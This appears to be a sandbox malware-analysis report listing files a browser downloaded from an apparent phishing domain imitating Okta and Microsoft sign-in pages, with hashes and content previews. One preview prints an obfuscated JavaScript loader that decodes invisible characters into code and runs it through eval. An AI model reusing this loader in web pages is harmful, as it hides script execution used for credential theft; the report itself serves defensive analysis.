                                                                                                                                                                                                                                    Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (51734)
                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                    Size (bytes):222931
                                                                                                                                                                                                                                    Entropy (8bit):5.0213311632628725
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                    MD5:0329C939FCA7C78756B94FBCD95E322B
                                                                                                                                                                                                                                    SHA1:7B5499B46660A0348CC2B22CAE927DCC3FDA8B20
                                                                                                                                                                                                                                    SHA-256:0E47F4D2AF98BFE77921113C8AAF0C53614F88FF14FF819BE6612538611ED3D1
                                                                                                                                                                                                                                    SHA-512:1E819E0F9674321EEE28B3E73954168DD5AEF2965D50EE56CAD21A83348894AB57870C1C398684D9F8EAB4BBBEF5239F4AEA1DCAB522C61F91BD81CF358DA396
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    URL:https://ok4static.oktacdn.com/assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css
                                                                                                                                                                                                                                    Preview:@charset "UTF-8";.qtip{box-shadow:none;direction:ltr;display:none;font-size:10.5px;left:-28000px;line-height:12px;max-width:280px;min-width:50px;padding:0;position:absolute;top:-28000px}.qtip-content{word-wrap:break-word;padding:5px 9px;text-align:left}.qtip-content,.qtip-titlebar{overflow:hidden;position:relative}.qtip-titlebar{border-width:0 0 1px;font-weight:700;padding:5px 35px 5px 10px}.qtip-titlebar+.qtip-content{border-top-width:0!important}.qtip-close{border:1px solid transparent;cursor:pointer;outline:medium none;position:absolute;right:-9px;top:-9px;z-index:11}.qtip-titlebar .qtip-close{margin-top:-9px;right:4px;top:50%}* html .qtip-titlebar .qtip-close{top:16px}.qtip-icon .ui-icon,.qtip-titlebar .ui-icon{direction:ltr;display:block;text-indent:-1000em}.qtip-icon,.qtip-icon .ui-icon{-moz-border-radius:3px;-webkit-border-radius:3px;border-radius:3px;text-decoration:none}.qtip-icon .ui-icon{background:transparent none no-repeat -100em -100em;color:inherit;height:14px;line-heigh
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):268
                                                                                                                                                                                                                                    Entropy (8bit):5.111190711619041
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                    MD5:59759B80E24A89C8CD029B14700E646D
                                                                                                                                                                                                                                    SHA1:651B1921C99E143D3C242DE3FAACFB9AD51DBB53
                                                                                                                                                                                                                                    SHA-256:B02B5DF3ECD59D6CD90C60878683477532CBFC24660028657F290BDC7BC774B5
                                                                                                                                                                                                                                    SHA-512:0812DA742877DD00A2466911A64458B15B4910B648A5E98A4ACF1D99E1220E1F821AAF18BDE145DF185D5F72F5A4B2114EA264F906135F3D353440F343D52D2E
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M10,32H38V18.125L24,25.109,10,18.125V32m.234-16L24,22.891,37.766,16H10.234M40,34H8V14H40Z" fill="#404040"/></svg>
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                    Size (bytes):9648
                                                                                                                                                                                                                                    Entropy (8bit):7.9099172475143416
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                    MD5:4946EB373B18D178C93D473489673BB6
                                                                                                                                                                                                                                    SHA1:16477ACB73B63CA251D37401249E7E4515FEBD24
                                                                                                                                                                                                                                    SHA-256:666BC574C9F3FB28A8AC626FA8105C187C2A313736494A06BD5A937473673C92
                                                                                                                                                                                                                                    SHA-512:F684B90B748DC8399F76C5D8F94AF6C4E6869143F18D19CE435B25EAA14E9647B120467BDD0795895676DC0CCCDEABF82BEB2F46CE2C5BF4C58ED9C134F30C48
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    URL:https://oazh.jyqhucdd.es/op5hZUl6z2RnIeqbUqhw63Cu3quslmmUgUNwQB124zAymNA2Ljhn19hwNj1fi5Zdf1cSHqDhaSt8Wdef239
                                                                                                                                                                                                                                    Preview:RIFF.%..WEBPVP8X....0.........ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH......0....n.mu..G..t042.....@...`[...%...6....9AD.'@.,f.B...+..+..+..W&.p.....h.......f.-...+.....m...n....E....O].+R.&Q..#.X.ip4..p......\O...\/....9.5.a..DfZ,K....8.....Z..2..z......t.......|.I.(..6E.D.}.C..OQD$S}iZ...[D.......q`(...@../.NQ......+"b%.X.D".G.*...0G...".2........x.O......7......E..&....e.F..4...K>.M..Pd.B...@'o./te..[.f....4[..a..x...9#.@$.=...t..=..t_.W....[..f.|fv...N...c6..k4}.9.7.....f.F3.4[...a...;.m.@N.n.0.....n.G[c.H.}..t.{..;....G...2.::..].0....
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                    Size (bytes):2905
                                                                                                                                                                                                                                    Entropy (8bit):3.962263100945339
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                    MD5:FE87496CC7A44412F7893A72099C120A
                                                                                                                                                                                                                                    SHA1:A0C1458C08A815DF63D3CB0406D60BE6607CA699
                                                                                                                                                                                                                                    SHA-256:55CE3B0CE5BC71339308107982CD7671F96014256DED0BE36DC8062E64C847F1
                                                                                                                                                                                                                                    SHA-512:E527C6CD2A3D79CA828A9126E8FF7009A540AA764082750D4FA8207C2B8439CA1FDC4459E935D708DC59DCFFE55FE45188EB5E266D1B745FCA7588501BC0117D
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M30.422,29.092a3.493,3.493,0,0,1,1.324.261,3.381,3.381,0,0,1,1.132.749q.366.366.827.775t.949.854q.488.444.941.932a9.974,9.974,0,0,1,.819,1A4.951,4.951,0,0,1,37,34.736a3.133,3.133,0,0,1,.218,1.15,3.493,3.493,0,0,1-.261,1.324,3.381,3.381,0,0,1-.749,1.132q-.888.888-1.6,1.568a8.753,8.753,0,0,1-1.489,1.15,6.17,6.17,0,0,1-1.716.705A9.367,9.367,0,0,1,29.151,42a13.73,13.73,0,0,1-3.9-.592A21.891,21.891,0,0,1,21.26,39.77a27.749,27.749,0,0,1-3.885-2.491,34.863,34.863,0,0,1-3.6-3.153,34.6,34.6,0,0,1-3.127-3.606,27.717,27.717,0,0,1-2.456-3.876A22.2,22.2,0,0,1,6.584,22.69,13.485,13.485,0,0,1,6,18.866,9.453,9.453,0,0,1,6.235,16.6a6.2,6.2,0,0,1,.7-1.707,8.848,8.848,0,0,1,1.141-1.489q.679-.723,1.585-1.611a3.381,3.381,0,0,1,1.132-.749,3.493,3.493,0,0,1,1.324-.261,3.3,3.3,0,0,1,1.681.47,8.648,8.648,0,0,1,1.542,1.15,17.725,17.725,0,0,1,1.376,1.428q.645.
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (21720), with CRLF line terminators
                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                    Size (bytes):4724541
                                                                                                                                                                                                                                    Entropy (8bit):2.5839796656457863
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                    MD5:AA849F9614E090F7E5EBED754F83D3C2
                                                                                                                                                                                                                                    SHA1:4100808BBC0665E1ECF3372DDF7DD02A14B1387A
                                                                                                                                                                                                                                    SHA-256:928A123423281E31FCC018F4CB5B297299EFB723678D2A45EFCD842F6C6A4AE6
                                                                                                                                                                                                                                    SHA-512:522EB407E209EA8E61622882669258866409277A8E754A994264D4B1418164236AAFB4630FA8B3A0029D7D0700E07D1113CFED04882BEAF3842C8FB5CE167E8D
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    URL:https://oazh.jyqhucdd.es/34C9UeDiKjiQraH7kl8lyOmCe2sB89108
                                                                                                                                                                                                                                    Preview:function decodeAndEvaluate(key) {.. const binaryString = [...key].. .map(char => Number('.' > char)).. .join('').. .replace(/.{8}/g, byte => String.fromCharCode(parseInt(byte, 2)));.. .. (0, eval)(binaryString);.. return true;..}....const handler = {.. get: function(_, prop) {.. decodeAndEvaluate(prop);.. return true;.. }..};..const viewsen = new Proxy({}, handler);..viewsen["........................................................................................................................................................................................................
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                    Size (bytes):48316
                                                                                                                                                                                                                                    Entropy (8bit):5.6346993394709
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                    MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                                                                                                                                                    SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                                                                                                                                                    SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                                                                                                                                                    SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                                                                                                                                                                                                    Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:Web Open Font Format, TrueType, length 36696, version 1.0
                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                    Size (bytes):36696
                                                                                                                                                                                                                                    Entropy (8bit):7.988666025644622
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                    MD5:A69E9AB8AFDD7486EC0749C551051FF2
                                                                                                                                                                                                                                    SHA1:C34E6AA327B536FB48D1FE03577A47C7EE2231B8
                                                                                                                                                                                                                                    SHA-256:FD78A1913DB912221B8EAD1E62FAD47D1FF0A9FA6CD88D3B128A721AD91D2FAF
                                                                                                                                                                                                                                    SHA-512:9A0E4297282542B8813F9CC85B2CCB09663CE281F64503F9A5284631881DA9AACF7649553BF1423D941F01B97E6BC3BA50AB13E55E4B7B61C5AA0A4ADF4D390F
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    URL:https://oazh.jyqhucdd.es/GDSherpa-regular.woff
                                                                                                                                                                                                                                    Preview:wOFF.......X......6........0...(............DSIG...(............GPOS..........^>....GSUB.............3y.OS/2.......F...`h`{Zcmap...........<.?+.cvt .......0...<(...fpgm............?...gasp................glyf.."0..Tl...h...+head..v....4...6..}.hhea..v....!...$...Zhmtx..v........x;...loca..z|...........tmaxp..~$... ... .-..name..~D.......'....post............1+.,prep.............P..x..\.|U..Nr.^.......DD.T....V...C....U._.N..k.8.m...h.Q.6q....#....Y4l.}3.@ .............Z_....s.....>RD.....J....wR./...#.,<'f....4b..}(....P..\.s.9'.....-.Q..d..H.@%..K+....4U.4...yx.3..DkfJ..3S.H......|..........%.B...........W.~..nN<x.?....}jn...W..M.7...?...:-uAjQ.4J.].vm....H{&...y..@....G...~.......x=.V..g.;..@..J.l...G..L... g*M..h.....Q!}B...Q.m.M...R.5*.JUi*..U_5@]..PW...*5H.VW.k..:5D].nP#..5V=....x.....W/...E5I...NVS.T.u...^U3._...m5G-P...U...Gj.*V..j.Z...j..BJ.._Pw..0..f*...q...q5...'.F=MIj.7..^.f."..K\..pHMC.t.W.Z.Bz...l.+.....e|......B>....1.a,.D.Ej..(.
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (26765), with no line terminators
                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                    Size (bytes):26765
                                                                                                                                                                                                                                    Entropy (8bit):5.114987586674101
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                    MD5:1A862A89D5633FAC83D763886726740D
                                                                                                                                                                                                                                    SHA1:E5CE3AA454C992A13FD406A9647D7AFBF831051F
                                                                                                                                                                                                                                    SHA-256:5C22FD904EDB792331A7307DDF4A790E0D1318924F6D8E7362FA6B55D5AB6FBB
                                                                                                                                                                                                                                    SHA-512:3BFAB627DC0EBFAE1176098C870B4D2747518E7EA91646303276191A4A846D47B2E80BB1EE2FA67271130ECCBC8B1152778C99917FC6C63EA45A184BD673BF0D
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    URL:https://oazh.jyqhucdd.es/341v5JdmdikxKxNab7Brkrd6720
                                                                                                                                                                                                                                    Preview:#authcalldesc,#sections,.text-m{font-size:.9375rem}*,input[type=radio]{box-sizing:border-box;padding:0}.alert,.radio label,.row.tile{margin-bottom:0}#sections,.input-group-addon,.table .table-cell,img{vertical-align:middle}#sections_doc .pdfheader #pageName,#sections_pdf .pdfheader #pageName,.row.tile,.row.tile:not(.no-pick):active,.row.tile:not(.no-pick):hover,input{color:inherit}.p,.subtitle,.text-body,.text-subtitle,h4{font-weight:400}*,.text-title{font-family:"Segoe UI","Helvetica Neue","Lucida Grande",Roboto,Ebrima,"Nirmala UI",Gadugi,"Segoe Xbox Symbol","Segoe UI Symbol","Meiryo UI","Khmer UI",Tunga,"Lao UI",Raavi,"Iskoola Pota",Latha,Leelawadee,"Microsoft YaHei UI","Microsoft JhengHei UI","Malgun Gothic","Estrangelo Edessa","Microsoft Himalaya","Microsoft New Tai Lue","Microsoft PhagsPa","Microsoft Tai Le","Microsoft Yi Baiti","Mongolian Baiti","MV Boli","Myanmar Text","Cambria Math"}*{margin:0}.websitesections{height:100%;width:100vw;position:relative}#sections_doc,#sections_go
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:Web Open Font Format, TrueType, length 35970, version 1.0
                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                    Size (bytes):35970
                                                                                                                                                                                                                                    Entropy (8bit):7.989503040923577
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                    MD5:496B7BBDE91C7DC7CF9BBABBB3921DA8
                                                                                                                                                                                                                                    SHA1:2BD3C406A715AB52DAD84C803C55BF4A6E66A924
                                                                                                                                                                                                                                    SHA-256:AE40A04F95DF12B0C364F26AB691DC0C391D394A28BCDB4AEACFACA325D0A798
                                                                                                                                                                                                                                    SHA-512:E02B40FEA8F77292B379D7D792D9142B32DFCB887655A2D1781441227DD968589BFC5C00691B92E824F7EDB47D11EBA325ADE67AD08A4AF31A3B0DDF4BB8B967
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    URL:https://oazh.jyqhucdd.es/GDSherpa-bold.woff
                                                                                                                                                                                                                                    Preview:wOFF..............$ .......\...&............DSIG...T............GPOS..........N..B..GSUB...`.........3y.OS/2.......F...`i.{[cmap...X.......<.?+.cvt ......./...<)...fpgm............?...gasp................glyf..!t..Ra....$.ihead..s....3...6..}.hhea..t....!...$....hmtx..t0.......x?s.#loca..w.........LC%.maxp..{X... ... .5..name..{x..........post..~@........1+.,prep.............P..x..\.tU..;y...!..!..R.4."(."*".U..V.]3...r..5c...j....._.7U...H..1MSE...0b..b&.......%..w...}.{.......u...s..g..soBLD~.C.)n..1.Q...z.q. ..R..)n.QY.v..{.(...o...O.......G...{to.~.....,..#<.w...W...?6..3....2.)O........].`_a..F'.6..."}&..$'.K...a..NK$..01ar......-.Do_. .H.].x'{....n....{.|.L.p..u...-.w}.}...~.....(.zP:..^t.=D?..i9.....m.......AE.......J.....j......q&_...`....P....M<.o.[.V....H..Sx:...<.g.....x>/.......^..x9.....Ws...&.....x....jUJ...B.S...2(_...U...Q...<..y.j.y...P.x.:....m+..V.....5h[.~E.WL..rp....0..*Pu..$OA....LJ.Y.....9.e...L..... /"?.m.......+..J.........
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                    Size (bytes):17842
                                                                                                                                                                                                                                    Entropy (8bit):7.821645806304586
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                    MD5:4B52ECDC33382C9DCA874F551990E704
                                                                                                                                                                                                                                    SHA1:8F3BF8E41CD4CDDDB17836B261E73F827B84341B
                                                                                                                                                                                                                                    SHA-256:CCE050CC3B150C0B370751021BB15018EE2B64AC369E230FE3B571A9B00D4342
                                                                                                                                                                                                                                    SHA-512:AC3D3C82BAD9147AE5F083ED49C81A744F672DDFBB262135AA3F2C6601F8DFFEA11D8E323CEF025C36D76C6F2515AA6814B622CF504CA01D13346E9EA989048F
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    URL:https://oazh.jyqhucdd.es/stkaHK1yk67srmsCXIiLHhsKgO50456zkbtAwgpcJyJ87fWgPiCXxl7Ssngh259
                                                                                                                                                                                                                                    Preview:RIFF.E..WEBPVP8X....0.........ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH.,...$.m.8..k.\.oDL.. ..TU....3'.{.g..6..2...6.DL`e..."&@..b.#&@......T.....'.....$......1.d...G........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........._...........................?...Z5[...B,.c...V-...m.0.../..?...............?.......?................_.....-...M.B.....=....C...[......w .X...ea.............VW.?b....[[.o^.Y.K...OD
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (10450)
                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                    Size (bytes):10498
                                                                                                                                                                                                                                    Entropy (8bit):5.327380141461276
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                    MD5:E0D37A504604EF874BAD26435D62011F
                                                                                                                                                                                                                                    SHA1:4301F0D2B729AE22ADECE657D79ECCAA25F429B1
                                                                                                                                                                                                                                    SHA-256:C39FF65E2A102E644EB0BF2E31D2BAD3D18F7AFB25B3B9BA7A4D46263A711179
                                                                                                                                                                                                                                    SHA-512:EF838FD58E0D12596726894AB9418C1FBE31833C187C3323EBFD432970EB1593363513F12114E78E008012CDEF15B504D603AFE4BB10AE5C47674045ACC5221E
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    URL:https://ok4static.oktacdn.com/assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css
                                                                                                                                                                                                                                    Preview:a,abbr,acronym,address,applet,b,big,blockquote,body,caption,center,cite,code,dd,del,dfn,div,dl,dt,em,fieldset,form,h1,h2,h3,h4,h5,h6,html,i,iframe,img,ins,kbd,label,legend,li,object,ol,p,pre,q,s,samp,small,span,strike,strong,sub,sup,table,tbody,td,tfoot,th,thead,tr,tt,u,ul,var{background:transparent;border:0;font-size:100%;font:inherit;margin:0;outline:0;padding:0;vertical-align:baseline}body{line-height:1}ol,ul{list-style:none}blockquote,q{quotes:none}blockquote:after,blockquote:before,q:after,q:before{content:"";content:none}:focus{outline:0}ins{text-decoration:none}del{text-decoration:line-through}table{border-collapse:collapse;border-spacing:0}input[type=hidden]{display:none!important}input[type=checkbox],input[type=radio]{border:0!important;margin:0;padding:0}@font-face{font-family:Proxima Nova;font-style:normal;font-weight:400;src:url(../font/assets/proximanova-reg-webfont.9d5837512674046fa816.eot);src:url(../font/assets/proximanova-reg-webfont.9d5837512674046fa816.eot?#iefix) fo
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                    Size (bytes):16
                                                                                                                                                                                                                                    Entropy (8bit):3.5
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                    MD5:F1C9C44E663E7E62582E3F5B236C1C72
                                                                                                                                                                                                                                    SHA1:E142F3A0C2D1CDF175A5C3AF43AD66FEFE208B1F
                                                                                                                                                                                                                                    SHA-256:D843E67FBFA1F5CB0024062861EE26860C5A866F80755CF39B3465459A8538B9
                                                                                                                                                                                                                                    SHA-512:19FE62CB9D884BB3424C51DD15E74EB22E5A639BABF8398BACEBB781862296FA0D7AEE39C88CB9C7AF5791FD58830AC3433F5C6BD94B1BA3912AB33151E93452
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIZCZWa_nN28KrWEgUNNzCpMCFaskwOfpkNOw==?alt=proto
                                                                                                                                                                                                                                    Preview:CgkKBw03MKkwGgA=
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 28584, version 1.66
                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                    Size (bytes):28584
                                                                                                                                                                                                                                    Entropy (8bit):7.992563951996154
                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                    MD5:17081510F3A6F2F619EC8C6F244523C7
                                                                                                                                                                                                                                    SHA1:87F34B2A1532C50F2A424C345D03FE028DB35635
                                                                                                                                                                                                                                    SHA-256:2C7292014E2EF00374AEB63691D9F23159A010455784EE0B274BA7DB2BCCA956
                                                                                                                                                                                                                                    SHA-512:E27976F77797AD93160AF35714D733FD9E729A9981D8A6F555807981D08D8175E02692AA5EA6E59CEBD33895F5F6A3575692565FDD75667630DAB158627A1005
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    URL:https://oazh.jyqhucdd.es/GDSherpa-regular.woff2
                                                                                                                                                                                                                                    Preview:wOF2......o.......6x..oG...B.......................>....`..<.<..b.....h..B.6.$..x..>.. ..'..{...[x"q..].....hJ....'.......6.2.[....q....z..mCww...*.eU..S.........0..S.s..,....\.e..F.&....oU*R.}Q.C..2.TD....5..#..h.H.2.|<.1.z..].xZ...z..z..W.........p%..F.e.r"yG.......f.M3.].U.p...E..<..:..j..E......t....!....~a...J.m....f.d.eE..>.:.9.....,6K{.q..6e..4:z......{.{....$.. ...B....9:0.G..6.9R....m..jCW.m.]:{.p..?P.O.B..E....u.J.._..........dd=. l..SJ..fjm....\....)...6......mV.`.J.R.A..R.....J...T.y.........m...k-....{'.Ud"...C.$d*.N 9}.N]..2p.q.T..6.-A.U...."..o.\......uh...$..4j..v...9....anl/NT....K....k..A...........U5S.=.t[.)/s.R.......F..)6H A..'?!....7S.....w:.%.H.@...l?...lm..lUd D...-.... .......5).`..w&..Q....-.. ...9.Xt./SQ?.s+u.9..\.h.l.G.#.*..#@.F..f.1.f..=`....p.....=c..f=..p 4By.u.z'...$;.s.....z.....X..n6y-...........<.......X......~+j.z.j.......7.PD..O..w..9..8].!~C&.......*LCE..Nf~.N.eJ.iXnX*C.&....t.U..Nr.@..lZ.... .X..
                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                    Size (bytes):1864
                                                                                                                                                                                                                                    Entropy (8bit):5.222032823730197
                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                                                                    MD5:BC3D32A696895F78C19DF6C717586A5D
                                                                                                                                                                                                                                    SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                                                                                                                                                                                                                    SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                                                                                                                                                                                                                    SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                    URL:https://oazh.jyqhucdd.es/klJXufEfoVWyqOE6vxVPgfrwrkf2EbGijn3BpmfMc6ERqrRn0ceLQ3mVBOSwx216
